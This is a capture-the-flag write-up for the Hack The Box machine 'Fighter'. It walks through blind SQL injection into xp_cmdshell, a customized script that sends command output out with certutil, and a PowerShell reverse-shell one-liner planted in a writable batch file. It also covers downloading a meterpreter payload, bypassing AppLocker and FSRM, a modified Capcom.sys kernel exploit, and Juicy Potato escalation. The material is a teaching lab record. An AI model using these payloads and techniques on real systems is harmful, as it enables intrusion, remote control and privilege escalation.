Fighter is (or, if you prefer, was) a tough machine. Interesting enough, even if it is tagged insane, it can be rooted at least in three ways: one performing a lateral movement to the fighter\decoder user and two directly from fighter\sqlserv user. Here I’ll show you how to get the root flag directly from fighter\sqlsrv user with Metasploit (!) and with Juicy Potato. If you wonder what Juicy Potato is, check decorder’s blog right now or… follow this writeup!
Lesson learned
- Asp session cookie change name and value at each restart
- use dir /ah to display hidden files
- how to modify a metasploit module on the fly
- how to run an exe file without extension and with any extension you like
Nmap fast
# Nmap 7.70 scan initiated Sat May 5 21:01:04 2018 as: nmap -vvv -T4 -oA nmap/fast 10.10.10.72
Nmap scan report for 10.10.10.72
Host is up, received echo-reply ttl 127 (0.10s latency).
Scanned at 2018-05-05 21:01:04 CEST for 8s
Not shown: 999 filtered ports
Reason: 999 no-responses
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat May 5 21:01:12 2018 -- 1 IP address (1 host up) scanned in 8.67 seconds
Nmap targeted
# Nmap 7.70 scan initiated Sat May 5 21:18:25 2018 as: nmap -sC -sV -oA nmap/80 -n -p80 10.10.10.72
Nmap scan report for 10.10.10.72
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 5 21:18:40 2018 -- 1 IP address (1 host up) scanned in 14.38 seconds
Sites
With Burp running in background we browse to 10.10.10.72, where we enter a Street Fighter fan site. Here, at the top post, we find:
- a hint to “members” to use the “old” site,
- a reference to streetfighterclub.htb.
Using the hint we can find by guess members.streetfighterclub.htb, and get a 403 error. (I suppose that the “right” way is to fuzz the 3rd level domain with a suitable tool…)
With gobuster, we can find the /old/ path (or maybe that we can do an educated guess if you are smarter than me). Please note the -f option to add the slash after the dir name and -s to add 403 to the “standard” response codes reported by gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://members.streetfighterclub.htb/ -f -s 200,204,301,302,307,403 | tee gobuster.txt
gobuster
Since we are on gobuster, let’s use it to enumerate more. Not really needed, but it’s always better to be sure that “standard” things have been tried. Issue a
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://members.streetfighterclub.htb:80/old/ -x asp
and let it go for a long run while we continue. At the end it should output:
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://members.streetfighterclub.htb:80/old/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions : .asp
=====================================================
/login.asp (Status: 200)
/welcome.asp (Status: 302)
/Login.asp (Status: 200)
/Welcome.asp (Status: 302)
/verify.asp (Status: 302)
/Verify.asp (Status: 302)
/LogIn.asp (Status: 200)
/LOGIN.asp (Status: 200)
=====================================================
With or without gobuster, we should land to login.asp, an old-looking web login form that validates the credentials via /old/verify.asp:
sqlmap
We can manually try some basic SQLi on the parameters or we can use sqlmap, taking care to avoid some pitfalls kindly left on our path.
Since sqlmap has a known http-agent string, it may be filtered (and actually it’s filtered on Fighter). Other issues arise with the session cookie (ASPSESSIONID????????) that MUST be a valid one. The better thing to do to get this problem around is to save a legit request (but not the first one since it has no session cookie) from Burp and ask sqlmap to use it:
cat verity.req
POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Cookie: Email=; Level=%2D1; Chk=2941; password=YQ%3D%3D; username=YQ%3D%3D; ASPSESSIONIDAQABTRDR=NHGMECECCAOMLCPFAPNJKDCO
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
username=a&password=a&logintype=2&rememberme=ON&B1=LogIn
sqlmap -r verify.req --level 4 --risk 3
This command takes really a lot of time to get something out of the box. If you want to be faster, a more targeted command is:
sqlmap -r verify.req --level 4 --risk 3 --technique=B -p logintype --flush-session
Output
___
__H__
___ ___[']_____ ___ ___ {1.2.4#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:04:01
[23:04:01] [INFO] parsing HTTP request from 'verify_test.req'
[23:04:02] [INFO] flushing session file
[23:04:02] [INFO] testing connection to the target URL
[23:04:02] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://members.streetfighterclub.htb:80/old/Welcome.asp'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[23:04:08] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[23:04:09] [INFO] testing if the target URL content is stable
[23:04:09] [WARNING] heuristic (basic) test shows that POST parameter 'logintype' might not be injectable
[23:04:09] [INFO] testing for SQL injection on POST parameter 'logintype'
[23:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:04:19] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:04:20] [INFO] POST parameter 'logintype' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[23:04:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (4) value? [Y/n] y
[23:04:31] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[23:04:31] [INFO] checking if the injection point on POST parameter 'logintype' is a false positive
POST parameter 'logintype' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 117 HTTP(s) requests:
---
Parameter: logintype (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=a&password=a&logintype=-2349 OR 3286=3286&rememberme=ON&B1=LogIn
---
[23:04:37] [INFO] testing Microsoft SQL Server
[23:04:37] [INFO] confirming Microsoft SQL Server
[23:04:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[23:04:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 92 times
[23:04:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/members.streetfighterclub.htb'
[*] shutting down at 23:04:39
Please note that different answers to the various questions may lead to different findings. For instance, if we answer “no” when asked wheather to follow or not a 302 redirect, we get a different dbms identification:
[...]
[23:39:21] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft Access
[...]
Verify the blind SQLi
sqlmap is awesome but sometimes over complicates things. Let’s check this blind SQLi manually;
curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=0+or+1=1+--;&B1=LogIn"
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="Welcome.asp">here</a>.</body>
root@HTB:~/Documents/Fighter_72/httpserver#
yes, it works!
Get something out of the Blind SQLi
Getting something out of the box with a Blind SQLi is really hard because it is actually blind and because of some not-so-basic filtering done in the source code (we will see it). First things first, with some anti-WAF tricks (uppercase some letters), we can try to get a ping back:
curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=2;EXEC+Xp_cmdshell+'ping+10.10.14.44';&B1=LogIn"
if the output is something like this…
tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
23:55:27.721727 IP 10.10.10.72 > 10.10.14.44: ICMP echo request, id 1, seq 65, length 40
23:55:27.721775 IP 10.10.14.44 > 10.10.10.72: ICMP echo reply, id 1, seq 65, length 40
23:55:28.729634 IP 10.10.10.72 > 10.10.14.44: ICMP echo request, id 1, seq 66, length 40
23:55:28.729682 IP 10.10.14.44 > 10.10.10.72: ICMP echo reply, id 1, seq 66, length 40
[...]
we have a confirmed RCE. If it doesn’t maybe that xp_cmdshell is disabled. We can enable it with:
curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=64738;EXEC+sp_configure+'show+advanced+options',1;EXEC+sp_configure+'Xp_cmdshell',1;RECONFIGURE;+--';&B1=LogIn"
and we can also disable it, if we want:
curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=64738;EXEC+sp_configure+'show+advanced+options',1;EXEC+sp_configure+'Xp_cmdshell',0;RECONFIGURE;+--';&B1=LogIn"
From blind RCE to shell
There are different ways of getting something more useful from our SQLi. For instance we can issue SQL commands that (1)create a table, (2) fill it with some output and (3) ask sqlmap to dump that table, but it is slow and error prone so, as usual, long story short: google (MSSQL RCE) is our friend and kindly suggest us to read Red Team Tales 0x01: From MSSQL SQL Injection to RCE and Reverse MSSQL shell · GitHub where we find mandros.py. Let’s customize it:
[...]
query_id = 0
target_url = "http://members.streetfighterclub.htb/old/verify.asp"
local_url = "http://10.10.14.44:443/"
local_port = 443
[...]
'''
Create payload and send command: adapt this function to your needs
'''
def send_command(cmd):
global target_url, local_url
payload = "2;"
payload += "declare @r varchar(6120),@cmdOutput varchar(6120);"
payload += "declare @res TABLE(line varchar(max));"
payload += "insert into @res exec Xp_cmdshell '%s';"
payload += "set @cmdOutput=(SELECT CAST((select stuff((select cast(char(10) as varchar(max)) + line FROM @res for xml path('')), 1, 1, '')) as varbinary(max)) FOR XML PATH(''), BINARY BASE64);"
payload += "set @r=concat('certutil -urlcache -f %s',@cmdOutput);"
payload += "exec Xp_cmdshell @r;"
payload += "--"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
h = {'User-Agent':user_agent}
# Customize from here
p = {
'username':'a',
'password':'a',
'logintype':payload % (cmd, local_url)
}
requests.post(target_url, headers=h, data=p)
'''
[...]
So we can use python ./mandros.py to get an almost working shell as fighter\sqlserv.
User flag
Since we are fighter\sqlserv, we cannot directly type the flag:
:\> icacls c:\users\decoder\desktop
C:\USERS\DECODER\DESKTOP: Access is denied.
but we can explore the box and find one file…
:\> icacls C:\USERS\DECODER\clean.bat
C:\USERS\DECODER\CLEAN.BAT Everyone:(M)
NT AUTHORITY\SYSTEM:(I)(F)
FIGHTER\decoder:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
…that stands out of the others, because we (Everyone) can modify (M) it.
:\> icacls c:\scripts\*
C:\SCRIPTS\largebackup.ps1 BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
C:\SCRIPTS\powerup.bat BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
C:\SCRIPTS\sherlock.bat BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
C:\SCRIPTS\sherlock.ps1 BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
C:\SCRIPTS\t.bat BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 5 files; Failed processing 0 files
Of course we can read this file. This is the content, at the moment (fortunately unfortunately when the machine was released the content was different, presumably forgotten by a tester and HTB team patched it some days after the release):
type c:\users\decoder\clean.bat
@echo off
del /q /s c:\users\decoder\appdata\local\TEMP\*.tmp
exit
Since we cannot dir c:\users\decoder\appdata\local\TEMP\ (we get an Access is denied error if we try) we should do an educated guess: if this script has a meaning in the box, it is somehow executed by a user that has access permission on that folder (for instance by a scheduled task or something like that, issued as fighter\decoder).
To test this assumption, we need to change the content of the file. But we can only modify it:
:\> echo exit > c:\users\decoder\clean.bat
Access is denied.
:\> echo exit >> c:\users\decoder\clean.bat
:\> type c:\users\decoder\clean.bat
@echo off
del /q /s c:\users\decoder\appdata\local\TEMP\*.tmp
exit
EXIT
Please note that the first exit command is the problem. Without it, a simple append would have been enough. But since exit is there we must get rid of it. Again, google is our friend: “windows command line truncate file” gives us windows - Resize a File in Command Prompt? - Super User, that is to say:
copy /y NUL c:\users\decoder\clean.bat
will truncate the file (and get rid of the exit). After that we can issue:
echo powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(''10.10.14.44'',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data | Out-String );$sendback2 = $sendback + ''PS '' + (pwd).Path + ''> '';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" >> c:\users\decoder\clean.bat
and wait to get a shell on our local nc -lnvp 80, where we can get our flag:
PS C:\> whoami
fighter\decoder
PS C:\> type c:\users\decoder\desktop\user.txt
bb6163c184f203af2a31a9**********
Administrator flag without relaying on decoder user
With a fighter\decoder shell we can explore the box. Long story short, the box is vulnerable to Windows Capcom.sys Kernel Execution Exploit (x64 only). Knowing the exploit, it’s quite clear why the creators choose Streetfighter V as the theme of the box (according to Wikipedia Street Fighter V is a fighting video game developed by Capcom and Dimps), but how we can get that Capcom.sys is what we need to pay attention to? A possible answer is driverquery /v which outputs:
#some columns have been removed
Module Name Display Name Driver Type State Link Date Path Init(bytes)
============ ====================== ============= ========== ====================== ================================================ ===========
[...]
bxfcoe Broadcom NetXtreme II Kernel Running 04/02/2013 22:38:12 C:\Windows\system32\drivers\bxfcoe.sys 4.096
bxois Broadcom NetXtreme II Kernel Running 04/02/2013 22:40:01 C:\Windows\system32\drivers\bxois.sys 4.096
Capcom Capcom Kernel Running 05/09/2016 08:43:33 \??\C:\Windows\drivers\Capcom.sys 384
Cbafilt Cbafilt File System Running 22/08/2013 13:39:31 C:\Windows\system32\drivers\cbafilt.sys 4.096
cdfs CD/DVD File System Rea File System Stopped 22/08/2013 13:40:15 C:\Windows\system32\DRIVERS\cdfs.sys 8.192
[...]
wtlmdrv Microsoft iSCSI Target Kernel Stopped 22/08/2013 13:39:19 C:\Windows\system32\drivers\wtlmdrv.sys 4.096
WudfPf User Mode Driver Frame Kernel Stopped 29/10/2014 03:46:27 C:\Windows\system32\drivers\WudfPf.sys 4.096
MpKsld802f98 MpKsld802f98b Kernel Running 28/02/1989 02:54:41 \??\c:\ProgramData\Microsoft\Microsoft Anti[...] 4.096
As we can see two drivers have a different path:
\??\C:\Windows\drivers\Capcom.sys
\??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{FC2F2842-A0CC-4E0E-A511-A0BFEF9613FB}\MpKsld802f98b.sys
Asking google about both of them, makes clear that Capcom.sys is our main suspect and… there is a metasploit module also! Quite uncommon for an insane decoder box… So we can plot a strategy: we may try to upload meterpreter to the box, change the exploit/windows/local/capcom_sys_exec in order to make it works on a windows server 2012 R2 and use it.
But since it is a kernel exploit we don’t really need to escalate to fighter\decoder. If we can upload and execute meterpreter on the box we should be able to own it.
Bypass antivirus, Applocker, Fsrm & co.
Since it is a insane decoder Windows box, we have to deal with some “standard” protections and limitations: Meterpreter is usually intercepted by antiviruses and, while trying to get the initial foothold to the box, we should have already found that we cannot write .exe .bat .com & co. files. These limitation can be done with Applock, FSRM and so on. But… we can still create (and write), even as fighter\sqlserv, files with no extension (or other extensions, as .txt for example) in the %temp% folder:
echo test > %temp%\temp.bat
access denied
echo test > %temp%\temp
type %temp%\temp
test
So let’s try to upload a meterpreter with no extension, using curl and certutil as fighter\sqlserv:
# on the 1st terminal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.44 LPORT=80 -f exe > M_RS_80
python -m SimpleHTTPServer 80
# and on a 2nd terminal
curl members.streetfighterclub.htb/old/verify.asp -d "username=test&password=test&logintype=2;EXEC+Xp_cmdshell+'certutil+-urlcache+-f+http://10.10.14.44/M_RS_80+C:\Users\sqlserv\AppData\Local\Temp\m_rs_80';&B1=LogIn"
#stop SimpleHTTPServer 80 on the 1st terminal
# setup meterpreter on a 3rd terminal
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 80
run -j
[*] Exploit running as background job 0.
With python ./mandros.py we chan check that the file is there:
dir %temp%
Volume in drive C has no label.
Volume Serial Number is BE85-B9AE
Directory of C:\Users\sqlserv\AppData\Local\Temp
19/05/2018 15:08 <DIR> .
19/05/2018 15:08 <DIR> ..
28/10/2017 17:36 175 InstallUtil.InstallLog
19/05/2018 15:08 73.802 M_RS_80
05/11/2017 05:41 5.316 web.config
3 File(s) 79.393 bytes
2 Dir(s) 23.740.166.144 bytes free
and also start it! Yes, even if it has no extension we can execute it: windows - How to run an executable file without the EXE extension using a CMD script? - Super User
#start meterpreter (no extension)
%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "Start-Process -FilePath C:\Users\sqlserv\AppData\Local\Temp\M_RS_80 -Wait -NoNewWindow"
# metasploit
[*] Started reverse TCP handler on 10.10.14.44:80
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 10.10.10.72
[*] Meterpreter session 1 opened (10.10.14.44:80 -> 10.10.10.72:50304) at 2018-05-19 15:12:39 +0200
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows FIGHTER\sqlserv @ FIGHTER 10.10.14.44:80 -> 10.10.10.72:49290 (10.10.10.72)
sessions -i 1
meterpreter > getuid
Server username: FIGHTER\sqlserv
meterpreter > sysinfo
Computer : FIGHTER
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : it_IT
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
Once we bypassed the antivirus and any protection on the extensions we can migrate to a 64bit process:
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
[....]
1144 1132 conhost.exe
1152 500 sqlservr.exe x64 0 FIGHTER\sqlserv C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
1236 1764 powershell.exe x86 0 FIGHTER\sqlserv C:\Windows\SYSWOW64\WINDOWSPOWERSHELL\V1.0\powershell.exe
1304 500 sqlwriter.exe
[....]
meterpreter > migrate 1152
[*] Migrating from 2924 to 1152...
[*] Migration completed successfully.
# background the sessions (ctrl+z)
search capcom
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/local/capcom_sys_exec 1999-01-01 normal Windows Capcom.sys Kernel Execution Exploit (x64 only)
apcom.sys
Modify the Metasploit exploit to get SYSTEM
As we have seen, the box is a Windows Server 2012 R2 so we need to comment out version checking on the Metasploit module in order to get system:
locate capcom_sys_exec
vi /usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb
def check
#if sysinfo['OS'] !~ /windows (7|8|10)/i
# return Exploit::CheckCode::Unknown
#end
# back to msfconsole
use exploit/windows/local/capcom_sys_exec
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 443
set SESSION 1
reload
[*] Reloading module...
run
[*] Started reverse TCP handler on 10.10.14.44:443
[*] Launching notepad to host the exploit...
[+] Process 3976 launched.
[*] Reflectively injecting the exploit DLL into 3976...
[*] Injecting exploit into 3976...
[*] Exploit injected. Injecting payload into 3976...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 10.10.10.72
[*] Meterpreter session 2 opened (10.10.14.44:443 -> 10.10.10.72:50316) at 2018-05-19 15:16:25 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd c:/users/administrator/desktop
meterpreter > dir
Listing: c:\users\administrator\desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 9216 fil 2017-10-24 17:02:29 +0200 checkdll.dll
100666/rw-rw-rw- 282 fil 2017-10-20 13:24:57 +0200 desktop.ini
100777/rwxrwxrwx 9728 fil 2018-01-08 22:34:39 +0100 root.exe
100777/rwxrwxrwx 13767776 fil 2017-10-24 21:06:32 +0200 vc_redist.x86.exe
meterpreter > shell
Process 2232 created.
Channel 3 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\users\administrator\desktop>root.exe
root.exe
root.exe <password>
c:\users\administrator\desktop>exit
meterpreter > download root.exe
[*] Downloading: root.exe -> root.exe
[*] Downloaded 9.50 KiB of 9.50 KiB (100.0%): root.exe -> root.exe
[*] download : root.exe -> root.exe
meterpreter > download checkdll.dll
[*] Downloading: checkdll.dll -> checkdll.dll
[*] Downloaded 9.00 KiB of 9.00 KiB (100.0%): checkdll.dll -> checkdll.dll
[*] download : checkdll.dll -> checkdll.dll
Reverse engineering root.exe and check.dll
After dowloading these files, we can use radare2 or IDA Free to understand what’s going on. With IDA Free is really a matter of minutes to open check.dll and find this peace of cake code:
loc_10001010:
mov cl, byte ptr ds:aFmFeholH[edx+eax] ; "Fm`fEhOl}h"
xor cl, 9
cmp cl, byte ptr ds:aFmFeholH[eax] ; "Fm`fEhOl}h"
jnz short loc_1000102F
that is to say “please xor each byte in Fm``fEhOl}h with 9” that outputs our beloved password: OdioLaFeta
So we can issue root.exe OdioLaFeta in c:\users\administrator\desktop and get the flag.
meterpreter > shell
cd c:\users\admninistrator\desktop
dir
root.exe OdioLaFeta
d801c1e9bd9a02f8fb30d8**********
Bonuses
Want to add a brand new executable extension (also callable from a .bat)?
set PATHEXT=%PATHEXT%;.txt
set pathext
file.txt
Want to know Applocker status from a cmd shell?
powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"
And what about FSRM (FileServerResourceManager)?
powershell -nop -c "import-module FileServerResourceManager; Get-FsrmSetting"
powershell -nop -c "import-module FileServerResourceManager; Get-FsrmFileScreen | FL"
Active : True
Description :
IncludeGroup : {Executable Files}
MatchesTemplate : False
Notification : {MSFT_FSRMAction}
Path : C:\Users
Template : Block Executable Files
PSComputerName :
Active : False
Description :
IncludeGroup : {pexe}
MatchesTemplate : False
Notification :
Path : C:\Windows\Temp
Template :
PSComputerName :
Active : True
Description :
IncludeGroup : {Executable Files}
MatchesTemplate : True
Notification : {MSFT_FSRMAction, MSFT_FSRMAction}
Path : C:\ProgramData
Template : Block Executable Files
PSComputerName :
[...]
powershell -nop -c "import-module FileServerResourceManager; (Get-FsrmFileGroup -name 'Executable Files').IncludePattern"
*.bat
*.cmd
*.com
*.cpl
*.exe
*.inf
*.js
*.jse
*.msh
*.msi
*.msp
*.ocx
*.pif
*.pl
*.ps1
*.scr
*.vb
*.vbs
*.wsf
*.wsh
powershell -nop -c "import-module FileServerResourceManager; (Get-FsrmFileGroup -name 'pexe').IncludePattern"
*.com
*.dll
*.exe
Still here? Here you are a precious gift
As I said there is (at least), another way to root the box. Fighter was not exploitable by any “normal” Rotten Potato derivatives. As far as I understand, it’s because the BITS service is disabled. But, when I finally had time to dig into Decoder’s Lonely Potato source code, a couple of months ago, I wondered if another DCOM service would have been exploitable in the same manner. And I asked Decoder.
Turned out that he was working, with his friend Ohpe, on a Potato on steroids version, that he named Juicy Potato, and released shortly after: Juicy Potato (abusing the golden privileges) – Decoder's Blog.
If you still have to try it, Fighter is the perfect place to practice with it! I used metasploit to get a shell as fighter\sqlserv, and used the PATHEXT trick to fire it with a suitable CLSID available on the box:
jp.batbat -t * -p test.batbat -l 7411 -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -z
As result you get:
{8BC3F05E-D86B-11D0-A075-00C04FB68820};
NT AUTHORITY\SYSTEM
Nice, isn’t it?
